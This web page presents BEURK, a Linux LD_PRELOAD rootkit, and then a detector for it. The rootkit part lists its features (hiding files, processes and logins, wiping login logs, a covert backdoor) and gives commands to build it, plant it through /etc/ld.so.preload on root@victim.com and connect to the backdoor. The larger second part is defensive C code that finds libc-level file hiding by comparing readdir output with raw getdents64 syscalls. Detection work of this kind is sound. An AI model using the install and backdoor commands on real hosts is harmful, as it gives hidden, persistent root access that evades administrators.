Pentest Tools
Published on October 13th, 2015
BEURK — Experimental Unix RootKit
BEURK is a userland preload rootkit for GNU/Linux (loaded through /etc/ld.so.preload), heavily focused on anti-debugging and anti-detection.
Features
- Hide attacker files and directories
- Realtime log cleanup (on utmp/wtmp)
- Hide attacker processes and logins from detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
Upcoming features
- ptrace(2) hooking for anti-debugging
- libpcap hooking to undermine local sniffers
- PAM backdoor for local privilege escalation
Usage
- Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
- Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
- Enjoy!
./client.py victim_ip:port # connect with furtive backdoor
Dependencies
The following packages are not required to build BEURK at the moment; they back the upcoming features listed above:
- libpcap: to avoid local sniffing
- libpam: for the local PAM backdoor
- libssl: for an encrypted backdoor connection
Example on debian:
apt-get install libpcap-dev libpam-dev libssl-dev
Installing BEURK
su -
git clone https://github.com/unix-thrust/beurk.git
cd beurk
./build beurk.conf
mv libselinux.so /lib
echo "/lib/libselinux.so" >> /etc/ld.so.preload   # append; a bare > would discard any existing preload entries
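The ld.so.preload entry written above is applied by the dynamic loader to every dynamically linked process on the host, so the rootkit's hooks live in libc's wrappers (opendir/readdir and friends), not in the kernel. The example below, added here and not part of BEURK or of the original page, turns that into a check from the defender's side: it counts the libraries listed in an ld.so.preload-style file, and compares libc's readdir(3) view of a directory with the kernel's getdents64(2) view obtained through syscall(2); any entry present in the second view but missing from the first is one libc is hiding. It assumes Linux with glibc and a writable /tmp for its constructed self-checks; the scratch directory, file names and sample preload contents are constructed for the example.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Record layout returned by getdents64(2) (the kernel's linux_dirent64). */
struct raw_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

static int is_dot(const char *n) { return !strcmp(n, ".") || !strcmp(n, ".."); }

/* Entries as seen through libc's readdir(3). A preload rootkit that hides
 * files interposes on this path, so hidden names are absent from this count. */
int count_via_readdir(const char *path) {
    DIR *d = opendir(path);
    if (!d) return -1;
    int n = 0;
    for (struct dirent *e; (e = readdir(d)) != NULL;)
        if (!is_dot(e->d_name)) n++;
    closedir(d);
    return n;
}

/* Entries as reported by the kernel: openat(2) and getdents64(2) are issued
 * via syscall(2), so the libc wrappers a preload library hooks never run. */
int count_via_getdents(const char *path) {
    long fd = syscall(SYS_openat, AT_FDCWD, path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    char buf[8192] __attribute__((aligned(8)));
    int n = 0;
    for (;;) {
        long got = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (got < 0) { n = -1; break; }
        if (got == 0) break;
        for (long off = 0; off < got;) {
            struct raw_dirent64 *de = (struct raw_dirent64 *)(buf + off);
            if (!is_dot(de->d_name)) n++;
            off += de->d_reclen;
        }
    }
    syscall(SYS_close, fd);
    return n;
}

/* 0 on a clean host; >0 when libc hides entries the kernel reports, which is
 * the signature of a readdir hook. -1 if the directory cannot be read. */
int hidden_entries(const char *path) {
    int a = count_via_readdir(path), b = count_via_getdents(path);
    return (a < 0 || b < 0) ? -1 : b - a;
}

/* Libraries listed in an ld.so.preload-style file, read with raw syscalls so
 * a hooked open/read cannot hide the file. Whitespace and ':' separate
 * entries; an absent file means nothing is preloaded (0). */
int preload_entries(const char *preload_file) {
    long fd = syscall(SYS_openat, AT_FDCWD, preload_file, O_RDONLY);
    if (fd < 0) return 0;
    char buf[4096];                      /* the real file is a few lines at most */
    long got = syscall(SYS_read, fd, buf, sizeof buf - 1);
    syscall(SYS_close, fd);
    if (got < 0) return -1;
    buf[got] = '\0';
    int n = 0;
    for (char *t = strtok(buf, " \t\r\n:"); t; t = strtok(NULL, " \t\r\n:")) n++;
    return n;
}

/* Constructed self-check: scratch directory with three files. Without a
 * readdir hook both views count 3; returns the hidden count (expected 0). */
int self_check_dir(void) {
    char dir[] = "/tmp/preloadchk.XXXXXX", p[64];
    const char *names[] = {"alpha", "beta", "gamma"};
    if (!mkdtemp(dir)) return -1;
    for (int i = 0; i < 3; i++) {
        snprintf(p, sizeof p, "%s/%s", dir, names[i]);
        int fd = open(p, O_WRONLY | O_CREAT, 0600);
        if (fd < 0) return -1;
        close(fd);
    }
    int a = count_via_readdir(dir), b = count_via_getdents(dir), h = hidden_entries(dir);
    for (int i = 0; i < 3; i++) { snprintf(p, sizeof p, "%s/%s", dir, names[i]); unlink(p); }
    rmdir(dir);
    return (a == 3 && b == 3) ? h : -1;
}

/* Constructed self-check: a sample preload file naming three libraries on two
 * lines, one pair ':'-separated. Returns the parsed count (expected 3). */
int self_check_preload(void) {
    char file[] = "/tmp/preloadchk.XXXXXX";
    const char sample[] = "/lib/libselinux.so\n\n  /usr/lib/a.so:/usr/lib/b.so\n";
    int fd = mkstemp(file);
    if (fd < 0) return -1;
    if (write(fd, sample, sizeof sample - 1) != (ssize_t)(sizeof sample - 1)) return -1;
    close(fd);
    int n = preload_entries(file);
    unlink(file);
    return n;
}

int main(void) {
    printf("ld.so.preload entries: %d\n", preload_entries("/etc/ld.so.preload"));
    printf("hidden entries under /tmp: %d\n", hidden_entries("/tmp"));
    printf("self-check: dir=%d preload=%d\n", self_check_dir(), self_check_preload());
    return 0;
}
```

Run it as root against the directories an intruder would stage files in (/tmp, /dev/shm, /lib) and against /etc/ld.so.preload itself. The check is only as strong as its lowest layer: a preload library can interpose on syscall(3) as well as on readdir, so on a host you already distrust issue the syscalls from inline assembly or link the checker statically (a statically linked binary ignores ld.so.preload entirely), and run it from read-only media rather than from the compromised filesystem.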